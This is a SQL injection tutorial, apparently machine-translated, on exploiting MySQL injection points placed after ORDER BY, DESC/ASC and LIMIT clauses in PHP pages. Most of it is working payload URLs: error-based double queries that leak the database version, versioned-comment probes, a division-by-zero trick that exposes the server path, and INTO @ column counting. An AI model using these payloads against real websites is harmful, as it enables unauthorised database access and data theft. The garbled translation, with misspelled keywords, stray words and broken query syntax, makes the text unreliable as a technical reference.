When writing and translating the following documents, since the attackers have discovered the xday of dz and de, of course, it is complicated. Code similar to php codeSELET * FROM page WHERE id = 1 order by id [parameter] ASC [parameter] LIMIT 10, 10 [parameter] [parameter]-for injecting parameters, we cannot use union for injection, therefore, we can only use the double query after the order by id [parameter] that we can use. The following website code is assumed: http://www.domain.com/include/products.php?sb=id -This id is an injection point in order by [id]. I know that I can use union in another injection point. I want to perform such a test after order, we cannot use -- unoin, having, where, and some irrelevant keywords. We can use and for double query Code: http://www.domain.com/include/products.php?sb=id And (select count (*) from products group by concat (version (), 0x27202020, floor (rand (0) * 2-1) -- '5. 0.95-community (I use the 'products' table because I can see errors in this table. If you cannot see the table, you can use 'information _ schema. columns ') after desc/asc [parameter], the following website code is assumed to be used for double query: http://www.domain.com/include/products.php?sb=id -This is a small problem of id after desc [id] is an injection point after desc/asc, because we cannot use -- union, having, where, and, or, xor, *,>, so we cannot execute the query command. Therefore, we only need to add ',' to query the Code with the statement: http://www.domain.com/include/products.php?sb=id Desc, (select count (*) from users group by concat (version (), 0x27202020, floor (rand (0) * 2-1) '5. 0.95-community 'Suppose the following PHP Code is injected: SELECT * FROM page WHERE id = 1 order by [parameter] id to add '1', the Code can be injected as originally: 1 and (select count (*) from products group by concat (version (), 0 × 27202020, floor (rand (0) * 2-1 ))) -Use the following tips after the limit 10, 10 [parameters: http://www.bkjia.com /Include/products. php? Rw = 10-the injection point is in the form of limit 10. After the injection point is in the form of limit, we cannot do anything. Only the following commands offset, into, into outfile/dumpfile ,/*! */, For update, lock in share mode, so we want to try the following: obtain the total number of fields in the version burst path to obtain the version. We can use comments to obtain the mysql version. We can manually guess it. If it returns correct, the page will not be loaded, like blind injection, but there is a difference in Code: http://www.domain.com/include/products.php?rw=10 /*! 50094aaaa */If the page is not loaded, the version is later than 5.00.94Code: http://www.domain.com/include/products.php?rw=10 /*! 50096aaaa */The following version is not loaded: light rain 5.00.96Code: http://www.domain.com/include/products.php?rw=10 /*! If the 50095aaaa */page does not load, the full path is displayed when the version is 5.00.95. You can use the like format 0 or/**/to obtain the complete path, even if an error is reported on mysql, the Code is as follows: http://www.domain.com/include/products.php?rw=0 -This is the complete command PHP Code: select * from .... Limit 0, 0. We can also Code this way: http://www.domain.com/include/products.php?rw=/ **/1 error message: Division by zero in/home/teletec/public_html/include/products. using into to retrieve the total number of fields in php on line 164 does not really help us, but it is a good technique to assume that we have the following website Code: http://www.domain.com/include/products.php?rw=10 -- We can obtain the total number of fields in the like parameter of the injection point. Code: http://www.domain.com/include/products.php?rw=10 Into @ prompt error 1222.not 1 column. continue increasing @ Code: http://www.domain.com/include/products.php?rw=10 Into @,@............ http://www.domain.com/include/products.php?rw=10 Into @, @, [n ..] until the following error 1172 "Result consisted of more than one row" is returned, you can determine how many fields you want to learn in these skills.